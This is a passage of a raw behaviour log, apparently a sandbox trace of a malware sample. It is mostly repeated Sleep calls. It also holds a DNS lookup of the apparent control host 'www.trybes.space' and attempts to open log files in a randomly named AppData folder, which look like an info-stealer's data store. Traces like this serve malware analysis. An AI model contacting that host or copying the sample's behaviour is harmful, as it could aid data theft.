[0198.096] Sleep (dwMilliseconds=0x7d0) [0198.098] Sleep (dwMilliseconds=0x7d0) [0198.099] Sleep (dwMilliseconds=0x7d0) [0198.101] Sleep (dwMilliseconds=0x7d0) [0198.103] Sleep (dwMilliseconds=0x7d0) [0198.104] Sleep (dwMilliseconds=0x7d0) [0198.105] Sleep (dwMilliseconds=0x7d0) [0198.107] Sleep (dwMilliseconds=0x7d0) [0198.108] Sleep (dwMilliseconds=0x7d0) [0198.110] Sleep (dwMilliseconds=0x7d0) [0198.111] Sleep (dwMilliseconds=0x7d0) [0198.113] Sleep (dwMilliseconds=0x7d0) [0198.115] Sleep (dwMilliseconds=0x7d0) [0198.116] Sleep (dwMilliseconds=0x7d0) [0198.117] Sleep (dwMilliseconds=0x7d0) [0198.119] Sleep (dwMilliseconds=0x7d0) [0198.121] Sleep (dwMilliseconds=0x7d0) [0198.122] Sleep (dwMilliseconds=0x7d0) [0198.123] Sleep (dwMilliseconds=0x7d0) [0198.125] Sleep (dwMilliseconds=0x7d0) [0198.126] Sleep (dwMilliseconds=0x7d0) [0198.128] getaddrinfo (in: pNodeName="www.trybes.space", pServiceName="80", pHints=0x8791458*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x8791488 | out: ppResult=0x8791488*=0x0) returned 11002 [0198.387] Sleep (dwMilliseconds=0x7d0) [0198.388] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtPathName=0x10b3fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0198.388] NtCreateFile (in: FileHandle=0x10b3fac0, DesiredAccess=0x120089, ObjectAttributes=0x10b3fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlog00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fac0*=0xffffffffffffffff, IoStatusBlock=0x10b3fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0198.388] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa40 | out: HeapArray=0x10b3fa40*=0x4b0000) returned 0x6 [0198.388] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892b220) returned 1 [0198.388] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0198.388] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0198.389] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0198.389] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892a890) returned 1 [0198.389] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0198.389] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0198.389] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0198.389] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892b460) returned 1 [0198.389] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0198.389] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0198.389] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0198.389] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892a9b0) returned 1 [0198.389] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0198.389] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0198.389] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0198.389] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892b460) returned 1 [0198.389] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0198.389] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0198.389] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0198.389] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892af50) returned 1 [0198.389] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0198.389] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0198.390] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0198.390] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892a890) returned 1 [0198.390] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0198.390] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0198.390] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0198.390] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892a890) returned 1 [0198.390] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0198.390] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0198.390] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0198.390] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892b7c0) returned 1 [0198.390] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0198.390] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0198.390] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0198.390] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892b460) returned 1 [0198.390] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtPathName=0x10b3fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0198.390] NtCreateFile (in: FileHandle=0x10b3fa50, DesiredAccess=0x120089, ObjectAttributes=0x10b3fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa50*=0xffffffffffffffff, IoStatusBlock=0x10b3fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0198.391] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3f9d0 | out: HeapArray=0x10b3f9d0*=0x4b0000) returned 0x6 [0198.391] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892b460) returned 1 [0198.391] Sleep (dwMilliseconds=0x7d0) [0198.392] Sleep (dwMilliseconds=0x7d0) [0198.394] Sleep (dwMilliseconds=0x7d0) [0198.395] Sleep (dwMilliseconds=0x7d0) [0198.397] Sleep (dwMilliseconds=0x7d0) [0198.398] Sleep (dwMilliseconds=0x7d0) [0198.399] Sleep (dwMilliseconds=0x7d0) [0198.401] Sleep (dwMilliseconds=0x7d0) [0198.402] Sleep (dwMilliseconds=0x7d0) [0198.404] Sleep (dwMilliseconds=0x7d0) [0198.405] Sleep (dwMilliseconds=0x7d0) [0198.407] Sleep (dwMilliseconds=0x7d0) [0198.408] Sleep (dwMilliseconds=0x7d0) [0198.410] Sleep (dwMilliseconds=0x7d0) [0198.411] Sleep (dwMilliseconds=0x7d0) [0198.413] Sleep (dwMilliseconds=0x7d0) [0198.414] Sleep (dwMilliseconds=0x7d0) [0198.416] Sleep (dwMilliseconds=0x7d0) [0198.417] Sleep (dwMilliseconds=0x7d0) [0198.419] Sleep (dwMilliseconds=0x7d0) [0198.420] Sleep (dwMilliseconds=0x7d0) [0198.422] Sleep (dwMilliseconds=0x7d0) [0198.423] Sleep (dwMilliseconds=0x7d0) [0198.425] Sleep (dwMilliseconds=0x7d0) [0198.427] Sleep (dwMilliseconds=0x7d0) [0198.428] Sleep (dwMilliseconds=0x7d0) [0198.429] Sleep (dwMilliseconds=0x7d0) [0198.431] Sleep (dwMilliseconds=0x7d0) [0198.432] Sleep (dwMilliseconds=0x7d0) [0198.434] Sleep (dwMilliseconds=0x7d0) [0198.435] Sleep (dwMilliseconds=0x7d0) [0198.437] Sleep (dwMilliseconds=0x7d0) [0198.438] Sleep (dwMilliseconds=0x7d0) [0198.439] Sleep (dwMilliseconds=0x7d0) [0198.441] Sleep (dwMilliseconds=0x7d0) [0198.442] Sleep (dwMilliseconds=0x7d0) [0198.444] Sleep (dwMilliseconds=0x7d0) [0198.445] Sleep (dwMilliseconds=0x7d0) [0198.447] Sleep (dwMilliseconds=0x7d0) [0198.448] Sleep (dwMilliseconds=0x7d0) [0198.450] Sleep (dwMilliseconds=0x7d0) [0198.452] Sleep (dwMilliseconds=0x7d0) [0198.453] Sleep (dwMilliseconds=0x7d0) [0198.455] Sleep (dwMilliseconds=0x7d0) [0198.457] Sleep (dwMilliseconds=0x7d0) [0198.475] Sleep (dwMilliseconds=0x7d0) [0198.477] Sleep (dwMilliseconds=0x7d0) [0198.478] Sleep (dwMilliseconds=0x7d0) [0198.480] Sleep (dwMilliseconds=0x7d0) [0198.482] Sleep (dwMilliseconds=0x7d0) [0198.485] Sleep (dwMilliseconds=0x7d0) [0198.488] Sleep (dwMilliseconds=0x7d0) [0198.489] Sleep (dwMilliseconds=0x7d0) [0198.490] Sleep (dwMilliseconds=0x7d0) [0198.492] Sleep (dwMilliseconds=0x7d0) [0198.493] Sleep (dwMilliseconds=0x7d0) [0198.495] Sleep (dwMilliseconds=0x7d0) [0198.496] Sleep (dwMilliseconds=0x7d0) [0198.498] Sleep (dwMilliseconds=0x7d0) [0198.499] Sleep (dwMilliseconds=0x7d0) [0198.501] Sleep (dwMilliseconds=0x7d0) [0198.502] Sleep (dwMilliseconds=0x7d0) [0198.504] Sleep (dwMilliseconds=0x7d0) [0198.506] Sleep (dwMilliseconds=0x7d0) [0198.507] Sleep (dwMilliseconds=0x7d0) [0198.509] Sleep (dwMilliseconds=0x7d0) [0198.510] Sleep (dwMilliseconds=0x7d0) [0198.511] Sleep (dwMilliseconds=0x7d0) [0198.558] Sleep (dwMilliseconds=0x7d0) [0198.559] Sleep (dwMilliseconds=0x7d0) [0198.560] Sleep (dwMilliseconds=0x7d0) [0198.562] Sleep (dwMilliseconds=0x7d0) [0198.563] Sleep (dwMilliseconds=0x7d0) [0198.565] Sleep (dwMilliseconds=0x7d0) [0198.566] Sleep (dwMilliseconds=0x7d0) [0198.568] Sleep (dwMilliseconds=0x7d0) [0198.569] Sleep (dwMilliseconds=0x7d0) [0198.571] Sleep (dwMilliseconds=0x7d0) [0198.572] Sleep (dwMilliseconds=0x7d0) [0198.574] Sleep (dwMilliseconds=0x7d0) [0198.575] Sleep (dwMilliseconds=0x7d0) [0198.577] Sleep (dwMilliseconds=0x7d0) [0198.578] Sleep (dwMilliseconds=0x7d0) [0198.579] Sleep (dwMilliseconds=0x7d0) [0198.581] Sleep (dwMilliseconds=0x7d0) [0198.582] Sleep (dwMilliseconds=0x7d0) [0198.584] Sleep (dwMilliseconds=0x7d0) [0198.585] Sleep (dwMilliseconds=0x7d0) [0198.587] Sleep (dwMilliseconds=0x7d0) [0198.588] Sleep (dwMilliseconds=0x7d0) [0198.590] Sleep (dwMilliseconds=0x7d0) [0198.591] Sleep (dwMilliseconds=0x7d0) [0198.593] Sleep (dwMilliseconds=0x7d0) [0198.594] Sleep (dwMilliseconds=0x7d0) [0198.596] Sleep (dwMilliseconds=0x7d0) [0198.597] Sleep (dwMilliseconds=0x7d0) [0198.599] Sleep (dwMilliseconds=0x7d0) [0198.600] Sleep (dwMilliseconds=0x7d0) [0198.602] Sleep (dwMilliseconds=0x7d0) [0198.603] Sleep (dwMilliseconds=0x7d0) [0198.605] Sleep (dwMilliseconds=0x7d0) [0198.606] Sleep (dwMilliseconds=0x7d0) [0198.608] Sleep (dwMilliseconds=0x7d0) [0198.609] Sleep (dwMilliseconds=0x7d0) [0198.611] Sleep (dwMilliseconds=0x7d0) [0198.612] Sleep (dwMilliseconds=0x7d0) [0198.614] Sleep (dwMilliseconds=0x7d0) [0198.616] Sleep (dwMilliseconds=0x7d0) [0198.617] Sleep (dwMilliseconds=0x7d0) [0198.618] Sleep (dwMilliseconds=0x7d0) [0198.620] Sleep (dwMilliseconds=0x7d0) [0198.621] Sleep (dwMilliseconds=0x7d0) [0198.623] Sleep (dwMilliseconds=0x7d0) [0198.624] Sleep (dwMilliseconds=0x7d0) [0198.626] Sleep (dwMilliseconds=0x7d0) [0198.627] Sleep (dwMilliseconds=0x7d0) [0198.629] Sleep (dwMilliseconds=0x7d0) [0198.630] Sleep (dwMilliseconds=0x7d0) [0198.632] Sleep (dwMilliseconds=0x7d0) [0198.633] Sleep (dwMilliseconds=0x7d0) [0198.635] Sleep (dwMilliseconds=0x7d0) [0198.638] Sleep (dwMilliseconds=0x7d0) [0198.639] Sleep (dwMilliseconds=0x7d0) [0198.640] Sleep (dwMilliseconds=0x7d0) [0198.642] Sleep (dwMilliseconds=0x7d0) [0198.643] Sleep (dwMilliseconds=0x7d0) [0198.645] Sleep (dwMilliseconds=0x7d0) [0198.646] Sleep (dwMilliseconds=0x7d0) [0198.656] Sleep (dwMilliseconds=0x7d0) [0198.657] Sleep (dwMilliseconds=0x7d0) [0198.658] Sleep (dwMilliseconds=0x7d0) [0198.660] Sleep (dwMilliseconds=0x7d0) [0198.661] Sleep (dwMilliseconds=0x7d0) [0198.663] Sleep (dwMilliseconds=0x7d0) [0198.664] Sleep (dwMilliseconds=0x7d0) [0198.666] Sleep (dwMilliseconds=0x7d0) [0198.667] Sleep (dwMilliseconds=0x7d0) [0198.669] Sleep (dwMilliseconds=0x7d0) [0198.670] Sleep (dwMilliseconds=0x7d0) [0198.672] Sleep (dwMilliseconds=0x7d0) [0198.673] Sleep (dwMilliseconds=0x7d0) [0198.675] Sleep (dwMilliseconds=0x7d0) [0198.676] Sleep (dwMilliseconds=0x7d0) [0198.678] Sleep (dwMilliseconds=0x7d0) [0198.679] Sleep (dwMilliseconds=0x7d0) [0198.681] Sleep (dwMilliseconds=0x7d0) [0198.683] Sleep (dwMilliseconds=0x7d0) [0198.684] Sleep (dwMilliseconds=0x7d0) [0198.686] Sleep (dwMilliseconds=0x7d0) [0198.687] Sleep (dwMilliseconds=0x7d0) [0198.688] Sleep (dwMilliseconds=0x7d0) [0198.690] Sleep (dwMilliseconds=0x7d0) [0198.691] Sleep (dwMilliseconds=0x7d0) [0198.693] Sleep (dwMilliseconds=0x7d0) [0198.695] Sleep (dwMilliseconds=0x7d0) [0198.696] Sleep (dwMilliseconds=0x7d0) [0198.698] Sleep (dwMilliseconds=0x7d0) [0198.699] Sleep (dwMilliseconds=0x7d0) [0198.700] Sleep (dwMilliseconds=0x7d0) [0198.702] Sleep (dwMilliseconds=0x7d0) [0198.703] Sleep (dwMilliseconds=0x7d0) [0198.705] Sleep (dwMilliseconds=0x7d0) [0198.706] Sleep (dwMilliseconds=0x7d0) [0198.708] Sleep (dwMilliseconds=0x7d0) [0198.709] Sleep (dwMilliseconds=0x7d0) [0198.711] Sleep (dwMilliseconds=0x7d0) [0198.712] Sleep (dwMilliseconds=0x7d0) [0198.714] Sleep (dwMilliseconds=0x7d0) [0198.716] Sleep (dwMilliseconds=0x7d0) [0198.717] Sleep (dwMilliseconds=0x7d0) [0198.718] Sleep (dwMilliseconds=0x7d0) [0198.720] Sleep (dwMilliseconds=0x7d0) [0198.721] Sleep (dwMilliseconds=0x7d0) [0198.723] Sleep (dwMilliseconds=0x7d0) [0198.724] Sleep (dwMilliseconds=0x7d0) [0198.726] Sleep (dwMilliseconds=0x7d0) [0198.728] Sleep (dwMilliseconds=0x7d0) [0198.729] Sleep (dwMilliseconds=0x7d0) [0198.730] Sleep (dwMilliseconds=0x7d0) [0198.733] Sleep (dwMilliseconds=0x7d0) [0198.735] Sleep (dwMilliseconds=0x7d0) [0198.737] Sleep (dwMilliseconds=0x7d0) [0198.743] Sleep (dwMilliseconds=0x7d0) [0198.745] Sleep (dwMilliseconds=0x7d0) [0198.746] Sleep (dwMilliseconds=0x7d0) [0198.747] Sleep (dwMilliseconds=0x7d0) [0198.749] Sleep (dwMilliseconds=0x7d0) [0198.750] Sleep (dwMilliseconds=0x7d0) [0198.753] Sleep (dwMilliseconds=0x7d0) [0198.754] Sleep (dwMilliseconds=0x7d0) [0198.768] Sleep (dwMilliseconds=0x7d0) [0198.770] Sleep (dwMilliseconds=0x7d0) [0198.771] Sleep (dwMilliseconds=0x7d0) [0198.774] Sleep (dwMilliseconds=0x7d0) [0198.776] Sleep (dwMilliseconds=0x7d0) [0198.779] Sleep (dwMilliseconds=0x7d0) [0198.781] Sleep (dwMilliseconds=0x7d0) [0198.782] Sleep (dwMilliseconds=0x7d0) [0198.784] Sleep (dwMilliseconds=0x7d0) [0198.785] Sleep (dwMilliseconds=0x7d0) [0198.787] Sleep (dwMilliseconds=0x7d0) [0198.789] Sleep (dwMilliseconds=0x7d0) [0198.791] Sleep (dwMilliseconds=0x7d0) [0198.792] Sleep (dwMilliseconds=0x7d0) [0198.794] Sleep (dwMilliseconds=0x7d0) [0198.795] Sleep (dwMilliseconds=0x7d0) [0198.797] Sleep (dwMilliseconds=0x7d0) [0198.798] Sleep (dwMilliseconds=0x7d0) [0198.800] Sleep (dwMilliseconds=0x7d0) [0198.801] Sleep (dwMilliseconds=0x7d0) [0198.803] Sleep (dwMilliseconds=0x7d0) [0198.804] Sleep (dwMilliseconds=0x7d0) [0198.806] Sleep (dwMilliseconds=0x7d0) [0198.808] Sleep (dwMilliseconds=0x7d0) [0198.810] Sleep (dwMilliseconds=0x7d0) [0198.812] Sleep (dwMilliseconds=0x7d0) [0198.816] Sleep (dwMilliseconds=0x7d0) [0198.817] Sleep (dwMilliseconds=0x7d0) [0198.819] Sleep 